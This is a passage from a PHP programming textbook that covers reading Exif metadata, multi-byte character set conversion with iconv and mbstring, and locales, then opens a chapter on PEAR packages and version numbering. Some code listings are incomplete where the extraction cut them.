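list($x1, $y1, $x2, $y2) = bar_rect(0, 4000, 5, 640, 480, 8000);
```

A value of half the maximum fills half of the 320 pixels available between the axis and the top margin.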

Fig. 9.10 The result of the bar chart script.

9.5.3 Exif

Exif is not totally related to handling image content. Exif is a method, normally used by digital cameras, of storing metadata (such as time, focal length, and exposure time) inside a digital image. It’s a nice feature provided by PHP for learning more about how a photo was taken. To read Exif tags from images, compile PHP with the --enable-exif configure option, which does not require any external library. (On Windows, you need to enable the php_exif.dll in php.ini.) The section in phpinfo() should be similar to Figure 9.11.

Fig. 9.11 Exif phpinfo() output.

In the following example, we read Exif data from an image and display the aperture, shutter speed, focal length, and owner name.

Tip: For more information about the data stored in an image with Exif, see http://exif.org/specifications.html.

Note: Not all cameras set all headers, so you have to test whether a header exists!
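Testing for each header before using it might look like the sketch below. The array stands in for what exif_read_data() could return; its keys and values are sample data chosen for illustration, and the helper names rational_to_float() and describe_exif() are assumptions.

```php
<?php
// Exif stores many values as rationals such as "28/10"; convert to a float.
function rational_to_float($value)
{
    $parts = explode('/', $value);
    if (count($parts) === 2 && (float) $parts[1] != 0.0) {
        return (float) $parts[0] / (float) $parts[1];
    }
    return (float) $value;
}

// Build the list of strings to display, skipping headers the camera omitted.
function describe_exif(array $exif)
{
    $str = array();
    if (isset($exif['FNumber'])) {
        $str[] = 'f/' . rational_to_float($exif['FNumber']);
    }
    if (isset($exif['ExposureTime'])) {
        $str[] = $exif['ExposureTime'] . 's';
    }
    if (isset($exif['FocalLength'])) {
        $str[] = rational_to_float($exif['FocalLength']) . 'mm';
    }
    return $str;
}

// Sample data (assumption): this camera did not record FocalLength.
$sample = array('FNumber' => '28/10', 'ExposureTime' => '1/250');
echo implode('; ', describe_exif($sample)), "\n";
```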

The OwnerString is usually the name of the owner of the camera. If it’s available, we display it prefixed by the copyright sign.

    imagestring(
        $img, 5, 3, $size[1] - 21,
        implode('; ', $str),
        imagecolorallocate($img, 0, 0, 0)
    );
    imagestring(
        $img, 5, 2, $size[1] - 20,
        implode('; ', $str),
        imagecolorallocate($img, 0, 255, 0)
    );

With imagestring(), we draw the recorded data onto the image. imagestring() is not as nice as imagettftext() because it can only draw bitmap fonts, but it does the trick here. The first parameter is the image handle, and the second is the font number. The first two parameters are followed by the x and y coordinates, and then by the string to draw. The last parameter is the color.

    header('Content-Type: image/jpeg');
    imagejpeg($img, '', 90);
    ?>

The result of this script is the image shown in Figure 9.12 with the information added to it.

Fig. 9.12 Exif data drawn on the image.

If you look closely, you see that the copyright sign (©) is replaced by something we didn’t expect (Š). This is because the default fonts for imagestring() are always in the ISO-8859-2 character set and the script was written in ISO-8859-1. This brings us to the next topic.

9.6 MULTI-BYTE STRINGS AND CHARACTER SETS

Not all languages use the same character set, not even in the western world. For example, the Š is only part of ISO-8859-2, not of ISO-8859-1. Because these character sets only have 8 bits to use, they can encode only 256 different characters. That is a problem for languages such as Chinese, which have thousands of characters. That’s why the Chinese (and also other Asian scripts) have to use another encoding for their characters, such as BIG5 or GB2312. The Japanese use other encodings for their characters: EUC-JP, JIS, SJIS, and so on. All those different character sets are a problem to work with because some map the same character number to a different character (such as © and Š, which caused our problem at the end of the preceding section). That’s one of the reasons the Unicode project was started.
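The clash between © and Š can be reproduced with a single byte. This sketch assumes the iconv extension is loaded and that the underlying library knows both ISO-8859-1 and ISO-8859-2; it converts byte 0xA9 to UTF-8 under each interpretation and prints the resulting bytes in hexadecimal.

```php
<?php
// Byte 0xA9 is the copyright sign in ISO-8859-1 and S-with-caron in ISO-8859-2.
$byte = "\xA9";

$asLatin1 = iconv('ISO-8859-1', 'UTF-8', $byte);
$asLatin2 = iconv('ISO-8859-2', 'UTF-8', $byte);

echo bin2hex($asLatin1), "\n";   // c2a9, the UTF-8 form of U+00A9
echo bin2hex($asLatin2), "\n";   // c5a0, the UTF-8 form of U+0160
```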

Unicode solves the problem by assigning a number to every unique character, just like the ISO 10646 standard. This standard reserves 31 bits for characters, which should be more than enough room for every script out there (including “fictional” scripts like Tolkien’s Tengwar and the Egyptian hieroglyphs). The characters that fit in the range 0-127 are the same as the good old ASCII standard, and the range 0-255 is the same as iso-8859-1 (Latin 1). All “normal” scripts characters are encoded in the range 0-65533, a subset called the Basic Multilingual Plane (BMP). Because Unicode only assigns numbers to characters, it is not by itself used to store text; an encoding is needed for that. The simplest ways of encoding are UCS-2 and UCS-4, which store characters as 2- or 4-byte sequences. UCS-2 and UCS-4 are not really useful because there is a possibility of NULL bytes in the text or because the text would use too much space, even when the characters are only in the ASCII range. UTF-8, which solves these problems, is used more often. Characters in a UTF-8 encoded string can be 1 to 6 bytes long and can represent all 2^31 characters from UCS. This section of the chapter deals mainly with UTF-8 and conversions to other encodings (such as iso-8859-1).

Tip: For more information on Unicode, see the excellent FAQ at http://www.cl.cam.ac.uk/~mgk25/unicode.html.

9.6.1 Character Set Conversions

PHP 5 has support for character encoding and multi-byte issues in two extensions: iconv and mbstring. The main difference between the two is that iconv makes use of an external library (or the C library functions, if available), while the mbstring extension has the library bundled with PHP. Although iconv (at least in recent Linux distributions) supports many more encodings, mbstring might be the better choice for a script that has to be more portable. In addition to character encoding conversions, the mbstring extension includes a multi-byte regular expression library. The mbstring extension is enabled with the --enable-mbstring option. The additional regular expression support is enabled by default when mbstring is enabled, but it can be turned off with --disable-mbregex. The iconv extension is enabled with the --with-iconv switch. In Figures 9.13 and 9.14, you find the corresponding sections in phpinfo() for mbstring and iconv. The examples cover both extensions, whenever possible, and the character set used in the example scripts and output is in ISO-8859-15, unless otherwise noted.

Note: Some of these examples require OS support for the used character set. If something is not supported, you might see a different output for the example scripts.
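The space and NULL-byte drawbacks of UCS-2 and UCS-4 are easy to see for plain ASCII text. The sketch below assumes the iconv extension and a library that knows the UCS-2BE and UCS-4BE encodings; the sample string is arbitrary.

```php
<?php
$ascii = 'PHP';

$ucs2 = iconv('ISO-8859-1', 'UCS-2BE', $ascii);
$ucs4 = iconv('ISO-8859-1', 'UCS-4BE', $ascii);
$utf8 = iconv('ISO-8859-1', 'UTF-8', $ascii);

// Two and four bytes per character, with zero bytes as padding.
echo strlen($ucs2), ' bytes: ', bin2hex($ucs2), "\n";
echo strlen($ucs4), ' bytes: ', bin2hex($ucs4), "\n";

// UTF-8 leaves ASCII text untouched: one byte per character, no NULL bytes.
echo strlen($utf8), ' bytes: ', bin2hex($utf8), "\n";
```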

Fig. 9.13 mbstring phpinfo() output.

Fig. 9.14 iconv phpinfo() output.

In the first example, we convert ISO-8859-15 (Latin 9) text to UTF-8:

When the script runs, the output looks like this:

    ISO-8859-15: Kan De være så vennlig å hjelpe meg?
    UTF-8: Kan De và re sÃ¥ vennlig Ã¥ hjelpe meg?
    UTF-8: Kan De và re sÃ¥ vennlig Ã¥ hjelpe meg?
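A conversion of this kind can be sketched as follows. This is not the script that produced the output above, only a minimal illustration under assumptions: the iconv extension is loaded, mbstring is used only when available, and the sample bytes are “så” followed by the Euro sign, which sits at 0xA4 in ISO-8859-15.

```php
<?php
// "så", a space, and the Euro sign, written as ISO-8859-15 bytes.
$latin9 = "s\xE5 \xA4";

$utf8 = iconv('ISO-8859-15', 'UTF-8', $latin9);
echo bin2hex($utf8), "\n";

// mbstring offers the same conversion when the extension is loaded.
// Note the argument order: the target encoding comes before the source.
if (function_exists('mb_convert_encoding')) {
    $utf8_mb = mb_convert_encoding($latin9, 'UTF-8', 'ISO-8859-15');
    var_dump($utf8_mb === $utf8);
}
```

The single bytes for “å” and the Euro sign become two and three bytes in UTF-8, which is why the converted text looks broken when it is displayed as if it were still ISO-8859-15.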

Sometimes, it’s not possible to convert text from one encoding to another, as shown in the following example:

We try to convert the text “Denna text är på svenska.” from ISO-8859-1 to ISO-8859-2, but the “å” does not exist in ISO-8859-2. mb_convert_encoding() replaces the offending character (by default) with a “?”, whereas iconv() just aborts the conversion at that point. However, you can add the //TRANSLIT modifier to the “to” encoding parameter to tell iconv() to replace the offending character by a “?”. The //TRANSLIT modifier also tries to convert to a representation of a character, such as converting “©” to “(C)”, while converting from ISO-8859-1 to ISO-8859-2. You can use the mb_substitute_character() function to tell the mbstring extension to do something different with an offending character, as shown here:

outputs

    ISO-8859-1: Ce texte est en français.
    ISO-8859-4: Ce texte est en fran?ais.
    ISO-8859-4: Ce texte est en franais.
    ISO-8859-4: Ce texte est en franU+E7ais.

Tip: The web site http://www.eki.ee/letter/ is a useful tool that shows you what happens during character conversions. It provides lists of special characters needed to write a certain language, including a list of encodings that support this set.

mbstring also features a non-encoding encoding, html, which might be useful in some cases:

outputs

    ISO-8859-1: Esto texto es Español.
    html: Esto texto es Espa&ntilde;ol.

The third parameter to the mb_convert_encoding() function is optional and defaults to the “internal encoding” that you can set with the function mb_internal_encoding(). If there is a parameter, the function returns either TRUE, if the encoding is supported, or FALSE and a warning if the encoding is not supported. If no parameters are passed, the function simply returns the current setting:

    }
    echo mb_internal_encoding(). "\n";
    ?>

outputs

    ISO-8859-1
    UTF-8
    UTF-8

Tip: You can see a list with supported encodings by using the function mb_list_encodings().

The iconv extension has similar possibilities. The function iconv_set_encoding() can be used to set the internal encoding and the output encoding:

outputs

    UTF-8
    ISO-8859-1

The internal encoding setting has an effect on a couple of functions (which we cover in a bit) dealing with strings. The output encoding option doesn’t have any effect on those functions, but can be used in combination with the ob_iconv_handler output buffering handler. With this enabled, PHP will automatically convert the text output to the browser from internal encoding to output encoding. It adjusts the Content-type header if it wasn’t set in the script, and the current Content-type starts with text/.

This example changes the output encoding to UTF-8 and activates the output handler. The result is a UTF-8 encoded output page (see Figure 9.15):

    $text = <<

Fig. 9.15 UTF-8 encoded output.

The other way around is a bit more useful. It makes more sense to store all of your data in UTF-8 (for example, in a database) and convert to the correct encoding for the language you’re currently serving.

9.6.2 Extra Functions Dealing with Multi-Byte Character Sets

A couple of extra functions in both the mbstring and iconv extension are surrogates for some of the string functions. For example, iconv_strlen (and mb_strlen) returns the number of “characters” (not bytes) in the strings passed to the function:

    iconv_set_encoding('internal_encoding', $to);
    echo $string."\n";
    echo "strlen: ". strlen($string). "\n";
    $string = iconv($from, $to, $string);
    echo $string."\n";
    echo "strlen: ". strlen($string). "\n";
    echo "iconv_strlen: ". iconv_strlen($string). "\n";
    ?>

outputs

    Må jeg bytte tog?
    strlen: 17
    MÃ¥ jeg bytte tog?
    strlen: 18
    iconv_strlen: 17

The iconv_strlen() function takes into account the multi-byte character Ã¥ (which is UTF-8 for “å”). Replacement functions for strpos() and strrpos() also exist. With these and the replacement for substr(), you can safely find a multi-byte string inside another multi-byte string. While trying to come up with an example for these functions that shows why it is important to use the multi-byte variants of those functions, we realized that it does not matter at all if UTF-8 is used as the encoding. The common problem that we were trying to illustrate is that a uni-byte character (like ") could also be a part of a multi-byte character in the same string. However, for UTF-8 encoded strings this is not possible, because all bytes of a multi-byte character have ordinal values of 128 or greater, while single-byte characters are always less than the ordinal value 128.

iconv_substr() is still useful for a multi-byte version of a “shorten” function, which in the example adds an ellipsis if a string is longer than a given number of characters (not bytes!).
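The difference between counting bytes and counting characters, and a “shorten” function built on it, can be sketched as follows. The helper name shorten() is an assumption, and the character set is passed explicitly to each iconv function so that the sketch does not depend on the internal encoding setting.

```php
<?php
// Hypothetical helper: shorten $text to at most $max characters (not bytes)
// and append an ellipsis when something was cut off.
function shorten($text, $max, $charset = 'UTF-8')
{
    if (iconv_strlen($text, $charset) <= $max) {
        return $text;
    }
    return iconv_substr($text, 0, $max, $charset) . '...';
}

$text = "fran\xC3\xA7ais";   // "français" in UTF-8: 8 characters, 9 bytes

echo strlen($text), "\n";                  // counts bytes
echo iconv_strlen($text, 'UTF-8'), "\n";   // counts characters

$good = shorten($text, 5);             // cuts after the complete "ç"
$bad  = substr($text, 0, 5) . '...';   // cuts the "ç" in half
```

Here $bad ends in a lone 0xC3 byte and is no longer valid UTF-8, whereas $good keeps both bytes of the “ç” together.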

    echo "$text\n";
    echo ''. substr($text, 0, 26). "...\n";
    echo ''. iconv_substr($text, 0, 26). "...\n";
    ?>

Note: The character set in which this example is shown is UTF-8 and not ISO-8859-15.

When this script is run, the output in a browser will be similar to Figure 9.16.

Fig. 9.16 Broken UTF-8 characters.

As you can see, the normal substr() function doesn’t care about character sets. It chops the “ç” into two bytes, generating an invalid UTF-8 character, which is rendered as the black square with the question mark in it. iconv_substr() does a much better job. It “knows” that the “ç” is a multi-byte character and counts it as one. For this to work, the internal encoding needs to be set to “UTF-8.”

To demonstrate the use of iconv_strpos(), we use UCS-2BE (which actually doesn’t encode anything, but simply stores the least significant bits of a UCS character), rather than UTF-8. The following script shows why you need to use iconv_strpos() and cannot simply use strpos():

Because there is no way to create UCS-2BE encoded texts, we “create” a UCS-2BE encoded text from an ISO-8859-15 encoded string consisting of the Euro sign, a space, and the text 12.50. The Euro sign is especially interesting, because the UCS-2 encoding is 0x20 0xac (in hexadecimal). A single space in any ISO-8859-* encoding is assigned the same code 0x20. In Figure 9.17, you see the hexadecimal representation of the UCS-2 encoded string after Original.

    /* Initialize the output buffering mechanism */
    iconv_set_encoding('output_encoding', $output);
    ob_start('ob_iconv_handler');
    echo "Original: ", bin2hex($text), "\n";

We initialize the output buffer and set the output encoding to UTF-8. Then, we output the hexadecimal representation of our string, which will be converted to UTF-8 by the output buffer mechanism.

    /* The "wrong" way */
    $amount = substr($text, strpos($text, $space) + 1);

With strpos(), we locate the first space in the string. Then with substr(), we obtain everything following this first space and assign it to the $amount variable. However, this code doesn’t do what we expected.

    echo "After substr(): ", bin2hex($amount), "\n";
    ob_flush();

We print the hexadecimal representation of the new string and flush the output buffer. The flush is needed so that all data in the buffer is sent to the iconv output handler and we can reset the internal encoding to UCS-2BE. Without this flush, the output handler does not correctly encode the output (because it normally operates in blocks of 4096 bytes only). As you can see in Figure 9.17, following After substr():, the “space” was matched in the wrong location. The normal substr() function doesn’t know a thing about character sets, and thus the $amount variable does not contain valid UCS-2BE encoded text.

    iconv_set_encoding('internal_encoding', $internal);
    echo $amount;
    ob_flush();

We need to set the internal iconv encoding to UCS-2BE, echo the (broken) $amount string, and flush the output buffer so that we can change the internal encoding again.

    /* Convert space character to UCS-2BE and match again */
    $space = iconv('iso-8859-1', $internal, $space);
    $amount = iconv_substr($text, iconv_strpos($text, $space) + 1);

Now, we convert our space character into UCS-2BE too, so that we can use iconv_strpos() to find the first (real) occurrence in the string. iconv_strpos() uses the internal encoding setting to determine if a character is found inside the string. Just like the normal strpos(), it returns the position where the needle was found, or false if it wasn’t found. Therefore, because 0 can be returned if the needle was found in the first position, you need to compare with === false to see whether the needle was actually found. In our example, it doesn’t matter if the needle is found at position 0 or not at all, because false evaluates to 0 and iconv_substr() will copy the string starting from position 1 in both cases.

    iconv_set_encoding('internal_encoding', 'iso-8859-1');
    echo "\nAfter iconv_substr(): ", bin2hex($amount), "\n";
    ob_flush();

We temporarily set the internal encoding to ISO-8859-1 so that we can safely output the hexadecimal representation of the string. We flush the output buffer because we next want to output the $amount variable, which is encoded in UCS-2BE.

    iconv_set_encoding('internal_encoding', $internal);
    echo $amount;
    ?>

With these final statements, the full output is displayed, as shown in Figure 9.17. Notice that the first match (space = 0x20) is wrong. After the second one, the correct 0x0020 was found and the string chopped up accordingly.

Fig. 9.17 Problems without iconv_strpos().
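The false match can be reproduced without output buffering. The following is a minimal sketch rather than the script discussed above: it assumes the iconv extension with UCS-2BE support, builds the sample text from UTF-8 bytes, and passes the character set to each iconv function explicitly instead of changing the internal encoding.

```php
<?php
// Euro sign, space, "12.50" converted to UCS-2BE (two bytes per character).
$text = iconv('UTF-8', 'UCS-2BE', "\xE2\x82\xAC 12.50");

// Byte-wise search: 0x20 is also the first byte of the Euro sign (0x20 0xAC).
$wrong = strpos($text, ' ');

// Character-wise search, with the needle converted to the same encoding.
$space = iconv('UTF-8', 'UCS-2BE', ' ');
$pos   = iconv_strpos($text, $space, 0, 'UCS-2BE');

$amount = '';
if ($pos !== false) {   // strict comparison: position 0 would be a valid match
    $length = iconv_strlen($text, 'UCS-2BE');
    $amount = iconv_substr($text, $pos + 1, $length, 'UCS-2BE');
}

echo bin2hex($text), "\n";
echo iconv('UCS-2BE', 'UTF-8', $amount), "\n";
```

strpos() reports byte offset 0, inside the Euro sign, while iconv_strpos() reports character position 1, the real space.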

9.6.3 Locales

The mbstring extension has similar functions: mb_substr() and mb_strpos(). In addition, it has functions that can be used instead of the standard PHP functions strtoupper() and strtolower() (respectively, mb_strtoupper() and mb_strtolower()). The mbstring functions take into account Unicode properties so that they correctly change the string to upper- or lowercase characters for any supported character. But you don’t have to use the mbstring functions to do this for you because your operating system’s standard function library should support this by default. Information on how to upper- or lowercase a character is stored in a language’s locale. A locale is a collection of information defining the properties of language-dependent settings, such as the date/time formats, number formats, and also which uppercase character corresponds to a lowercase character and vice versa. In PHP, you can use the setlocale() function to set a new locale or query the current locale. There are a few different “types” of locales; each type is meant to control a different type of language-dependent property. The different types are shown in Table 9.9.

Table 9.9 Locale Types

Type: LC_COLLATE
Description: Determines the meaning of the \w and other classes for regular expressions,
Example(s): This setting has no effect on the standard PHP function to compare strings: strcmp(). Instead of using this function, you need to use the strcoll() function to compare strings according to the locale:

In Norwegian, the letter "æ" comes before the "å", but in the standard "C" locale, the "æ" comes after the "å" because its ordinal value is higher (230 versus 229). The output is therefore

    -1
    2

Type: LC_CTYPE
Description: Determines ... handled.
Example(s): In the standard "C" locale, there is no "å" defined, so there is no uppercase value of it. In Norwegian, the uppercase value is "Å", so the output of this script is

    åTTE
    ÅTTE

Type: LC_TIME
Description: Determines formatting of date and time.
Example(s): This locale type affects the strftime() function. We already showed you the different modifiers for the strftime() function when dealing with the date and time handling functions, so here is a short example to show how the locale affects the output of the strftime() function (the %c modifier returns the preferred date/time format defined by the locale). This outputs

    Fri 09 Apr 2004 11:13:52 AM CEST
    vr 09 apr 2004 11:13:52 CEST
    fre 09-04-2004 11:13:52 CEST

Type: LC_MESSAGES
Description: Determines the language in which application's ... might start from PHP.
Example(s): Because setlocale() only has effect on the current program, we need to use the putenv() function in this example to set the LC_MESSAGES locale to a different one. This outputs

    cat: nothere: No such file or directory
    cat: nothere: Ingen slik fil eller filkatalog

Type: LC_MONETARY
Description: Determines the format of monetary information, such as ...
Example(s): In PHP, these locale types affect the localeconv() function that returns information on how numbers and currency should be formatted according to a locale's properties:

    <?php
    function return_money($amount)
    {
        $li = localeconv();

        /* Pick the formatting rules for positive or negative amounts */
        if ($amount > 0) {
            $sign_placement = $li['p_sign_posn'];
            $cs_placement = $li['p_cs_precedes'];
            $space = $li['p_sep_by_space'] ? ' ' : '';
            $sign = $li['positive_sign'];
        } else {
            $sign_placement = $li['n_sign_posn'];
            $cs_placement = $li['n_cs_precedes'];
            $space = $li['n_sep_by_space'] ? ' ' : '';
            $sign = $li['negative_sign'];
        }

        /* The sign position selects the layout; $cs_placement tells
           whether the currency symbol precedes the amount.
           %1$s = amount, %2$s = sign, %3$s = currency symbol, %4$s = space */
        switch ($sign_placement) {
            case 0:
                $format = ($cs_placement) ? '(%3$s%4$s%1$s)' : '(%1$s%4$s%3$s)';
                break;
            case 1:
                $format = ($cs_placement) ? '%2$s %3$s%4$s%1$s' : '%2$s %1$s%4$s%3$s';
                break;
            case 2:
                $format = ($cs_placement) ? '%3$s%4$s%1$s %2$s' : '%1$s%4$s%3$s %2$s';
                break;
            case 3:
                $format = ($cs_placement) ? '%2$s %3$s%4$s%1$s' : '%1$s%4$s%2$s %3$s';
                break;
            case 4:
                $format = ($cs_placement) ? '%3$s %2$s%4$s%1$s' : '%1$s%4$s%3$s %2$s';
                break;
        }

        return sprintf($format . "\n", abs($amount), $sign, $li['currency_symbol'], $space);
    }

    setlocale(LC_ALL, 'nl_NL');
    echo return_money(-1291.81);
    echo return_money(1291.81);
    ?>

As you can see, we need a lot of code if we want to format numerical information correctly according to the locale; unfortunately, PHP does not have a built-in function for this.

Type: LC_NUMERIC
Description: Determines the format of numbers, such as the decimal point and thousands separator.

9.7 Summary

This chapter discusses miscellaneous features of PHP that are often needed for advanced PHP programming. This chapter provides information about working with streams (a feature of PHP) and about other features, such as regular expressions, date and time functions, building images, and converting between character sets, all of which are provided by PHP extensions.

Beginning with PHP 4.3.0, you can interact with files, processes, programs, or networks using streams. You can open, read, write, copy, rename, and otherwise manipulate local and remote files, including compressed files, and you can pipe information into and out of processes and programs using PHP functions that work with streams. Many stream functions are available, such as fopen(), which opens a file or URL for reading and/or writing data, and proc_open(), which starts a process by executing a command and establishes a pipe to the process that you can use to send and receive information from the process.

Regular expressions enable you to create patterns that you can then compare to text. Regular expressions are powerful mechanisms for testing text for flow control and for validating user input. Perl regular expressions, provided by the PCRE extension that is enabled by default, consist of a string of special characters and text representing general patterns that match text, such as [0-9], which matches any character between 0 and 9. PHP provides several functions for using regular expressions, such as preg_match(), which matches a string to a pattern and returns the matching strings in an array, and preg_replace(), which replaces a string that matches a pattern with another specified string.
Other important functions provided by PHP allow special handling of dates and times, the creation of images, and the conversion of text from one character set to another. Date and time functions enable you to store any date, including now, and format the date in many ways, taking locale and Daylight Saving Time (DST) into account. The GD extension (not enabled by default) has many functions that enable you to build images, including color images containing text and bar charts. The mbstring and iconv extensions provide functions that allow you to convert from one character set to another, such as converting a text string from ISO-8859-15 (Latin 9) to UTF-8. Locales are definitions of how different languages and/or areas represent text, date and time, and money. You can use the PHP function setlocale() to switch between locales and select different locales for different locale types.
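The locale functions summarized above can be tried without installing any extra locales, because the standard "C" locale is always available. The following minimal sketch relies on nothing beyond that; the sample strings are illustrative only, and other locale names (such as the ones used in Table 9.9) depend on what your operating system provides.

```php
<?php
// Select the always-available "C" locale for collation and numbers.
setlocale(LC_COLLATE, 'C');
setlocale(LC_NUMERIC, 'C');

// In the "C" locale, strcoll() orders strings by byte value,
// just like strcmp() does.
$order = strcoll('apple', 'banana');
echo ($order < 0) ? "apple sorts first\n" : "banana sorts first\n";

// localeconv() reports the formatting rules of the active locale.
$info = localeconv();
echo 'Decimal point: ', $info['decimal_point'], "\n";
```

Switching the two setlocale() calls to a language-specific locale is what changes the results of strcoll() and localeconv(); the rest of the script stays the same.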


CHAPTER 10

Using PEAR

10.1 Introduction

This book mentioned PEAR a few times in the preceding chapters. PEAR, short for PHP Extension and Application Repository, is a package system for PHP. During version 4 of PHP, the number of users exploded, and so did the number of code snippets you could download from different web sites. Some of these sites offered code that you had to copy and paste into your editor, while others let you download archives with source files. This was useful to many people, but there was a need for a better way of sharing and re-using PHP code, similar to Perl's CPAN.

The PEAR project set out to solve this problem by providing an installation and maintenance tool and code/release management standards. Today, PEAR provides

☞ The PEAR Installer (a package-management tool)
☞ Packages with PHP library code
☞ Packages with PHP extensions (PECL)
☞ PEAR coding standards, including a versioning standard

A spin-off from the PEAR project is PECL, the PHP Extension Community Library. PECL used to be a subset of PEAR, but today, it is managed separately. This means that PECL has its own web site, mailing lists, administrative routines, and so on.

However, PEAR and PECL share tools and infrastructure: Both use the PEAR Installer, both use the same package format, and both use the same versioning standard. The coding standard is different, however: PECL follows the PHP coding standard (for C code), while PEAR has its own.

In this chapter, you are first introduced to PEAR through its terminology and concepts. The rest of this chapter covers using the PEAR Installer to install and manage packages on your site.

After you finish reading this chapter, you will have learned how to

☞ Make sense of PEAR's package concept and how PEAR packages compare to other package formats
☞ Obtain the command-line PEAR Installer in UNIX/Linux, Windows, and Darwin
☞ Install, upgrade, and uninstall packages
☞ Configure the PEAR Installer
☞ Obtain and use the desktop (Gtk) PEAR Installer
☞ Obtain and use the PEAR Web Installer
☞ Interpret PEAR version numbers

10.2 PEAR Concepts

This section explains some PEAR concepts, namely packages, releases, and the versioning scheme.

10.2.1 Packages

When you want to install something from PEAR, you download and install a particular release of a package. (You learn more about releases later on.) Each package has some information associated with it:

☞ Package name (for example, HTML_QuickForm)
☞ Summary, description, and home page URL
☞ One or more maintainers
☞ License information
☞ Any number of releases

PEAR packages are not unlike other package formats, such as Linux's RPM, Debian packages, or the System V UNIX PKG format. One of the major differences with most of these is that PEAR packages are designed to be platform-independent, and not just within one family of operating systems, such as System V or Linux. Most PEAR packages are platform-independent; you can install them on any platform PHP supports, including all modern UNIX-like platforms, Microsoft Windows, and Apple's Mac OS X.

10.2.2 Releases

As with PHP itself, the code that you actually install is packaged in a tar.gz or zip file along with installation instructions. PEAR packages are also released through tar.gz (or tgz) files, and contain install instructions that are read by the PEAR Installer.

In addition to this package-specific information, each release contains

☞ A version number
☞ A list of files and installation instructions for each
☞ A release state (stable, beta, alpha, devel, or snapshot)

When you install a PEAR package, you receive the latest stable release by default, for example:

    $ pear install XML_Parser
    downloading XML_Parser-1.1.0.tgz ...
    Starting to download XML_Parser-1.1.0.tgz (7,273 bytes)
    ...done: 7,273 bytes
    install ok: XML_Parser 1.1.0

By running the command pear install XML_Parser, you obtain the latest stable release of the XML_Parser package, with the version number 1.1.0. You learn about these details later in this chapter.

There are several reasons why PEAR did not use an existing format such as RPM as its package format. The most obvious reason is that PHP is very portable, so the package format would have to be supported on every platform PHP runs on. That would have meant either porting and maintaining ports of RPM (for example) to Windows and Darwin, or implementing RPM in PHP. Both options were considered too much work, so the choice was to implement the installation tools in PHP to be able to use the tools on various platforms easily.

PEAR addresses the issues of integrating with RPM and other packaging systems by allowing PEAR packages to be wrapped inside operating system packages.

10.2.3 Version Numbers

PEAR defines some standards for packages: a coding standard that you will learn about in Chapter 12, “Building PEAR Components,” and a versioning standard. The versioning standard tells you how to interpret a version number and, more importantly, how to compare two version numbers.
PEAR's version number standard is pretty much what you are used to from open-source packages, but it has been put in writing and implemented through PHP's version_compare() function.

10.2.3.1 Version Number Format

A version number can be everything from a simple “1” to something awful, like “8.1.1.2.9b2.” However, PEAR cares about at most three numbers, plus an extra part at the end reserved for special cases, like “b1,” “RC2,” and so on. The syntax is like this:

    Major [ . minor [ . patch ]] [ dev | a | b | RC | pl [ N ]]
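The syntax above can be turned into a regular expression to see which parts of a version string PEAR cares about. This is a rough sketch, not PEAR's own parser: the function name parse_version() is hypothetical, and the optional hyphen before the release state is an assumption added so that strings such as "2.0.0-dev" are accepted.

```php
<?php
// Hypothetical helper, not part of PEAR: splits a version string into
// the parts named in the syntax above. Returns null if it does not fit.
function parse_version($version)
{
    $pattern = '/^(\d+)(?:\.(\d+)(?:\.(\d+))?)?(?:-?(dev|a|b|RC|pl)(\d*))?$/';
    if (!preg_match($pattern, $version, $m)) {
        return null;
    }
    // Unmatched trailing groups are left out of $m; pad them in.
    $m = array_pad($m, 6, '');

    return array(
        'major' => (int) $m[1],
        'minor' => ($m[2] === '') ? null : (int) $m[2],
        'patch' => ($m[3] === '') ? null : (int) $m[3],
        'state' => ($m[4] === '') ? null : $m[4] . $m[5],
    );
}

print_r(parse_version('1.2.1RC1'));       // major 1, minor 2, patch 1, state RC1
var_dump(parse_version('8.1.1.2.9b2'));   // more than three numbers: no match
```

Returning null for parts that are absent, rather than 0, keeps the difference between "1" and "1.0" visible, which matters when two versions are compared.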

All these forms of version numbers are valid (see Table 10.1).

Table 10.1 Example Version Numbers

    Version String   Major Version   Minor Version   Patch Level   Release State
    1                1               -               -             -
    1b1              1               -               -             b1
    1.0              1               0               -             -
    1.0a1            1               0               -             a1
    1.2.1            1               2               1             -
    1.2.1dev         1               2               1             dev
    2.0.0-dev        2               0               0             dev
    1.2.1RC1         1               2               1             RC1

Most PEAR packages use the two- or three-number variation, sometimes adding a “release state” part, such as “b1,” during release cycles. Here's an overview of the meaning of the release state component (see Table 10.2).

Table 10.2 Example Release States

    Extra   Meaning
    dev     In development; used for experimental releases.
    a       Alpha release; anything may still change, may have many bugs, and the API is not final.
    b       Beta release; API is more or less stable, but may have some bugs.
    RC      Release candidate; if testing reveals no problems, an RC is re-released as the final release.
    pl      Patch level; (not very often) used when doing an “oops” release with last-minute fixes.

10.2.3.2 Comparing Version Numbers

PEAR sometimes compares two version numbers to determine which signifies a “newer” release. For example, when you run the pear list-upgrades command, the version numbers of your installed packages are compared to the newest version numbers in the package repository on pear.php.net.

This comparison works by comparing the major version first. If the major version of A is bigger than the major version of B, A is newer than B, and vice versa. If the major version is the same, the minor version is compared the same way. But as specified in the previous syntax, the minor version is optional, so if only B has a minor version, B is considered newer than A. If the minor versions of A and B are the same, the patch level is compared in the same way. If the patch levels of A and B are equal, too, the release state part determines the result.
The comparison of the “extra” part is a little bit more involved because if A is missing a release state, that does not automatically make B newer. Release states starting with “dev,” “a,” “b,” and “RC” are considered older than “no extra part,” while “pl” (patch level) is considered newer.
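Because the standard is implemented through PHP's version_compare() function, the rules above can be checked directly. The following is a minimal sketch; the helper name newest() and the version pairs are chosen for illustration only.

```php
<?php
// Hypothetical helper: returns 'A', 'B', or 'same' for two versions.
function newest($a, $b)
{
    $result = version_compare($a, $b);  // negative, zero, or positive
    if ($result > 0) {
        return 'A';
    }
    return ($result < 0) ? 'B' : 'same';
}

$pairs = array(
    array('1.0',    '1.1'),    // minor version decides
    array('2.0',    '1.1'),    // major version decides
    array('2.0b1',  '2.0'),    // beta is older than no release state
    array('2.0RC1', '2.0b1'),  // release candidate is newer than beta
    array('1.0pl1', '1.0'),    // patch level is newer than no extra part
);

foreach ($pairs as $pair) {
    list($a, $b) = $pair;
    echo $a, ' vs ', $b, ': ', newest($a, $b), "\n";
}
```

version_compare() also accepts an operator as a third argument, for example version_compare($a, $b, '>='), which returns a boolean and is often more readable in upgrade checks.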

Some example comparisons include those shown in Table 10.3.

Table 10.3 Example Version Comparisons

    Version A   Version B   Newest?   Reason
    1.0         1.1         B         B has a greater minor version.
    2.0         1.1         A         A has a greater major version.
    2.0.1       2.0         A         A has a patch level; B does not.
    2.0b1       2.0         B         A “beta” release state is “older” than no release state.
    2.0RC1      2.0b1       A         “Release candidate” is newer than “beta” for the same major.minor version.
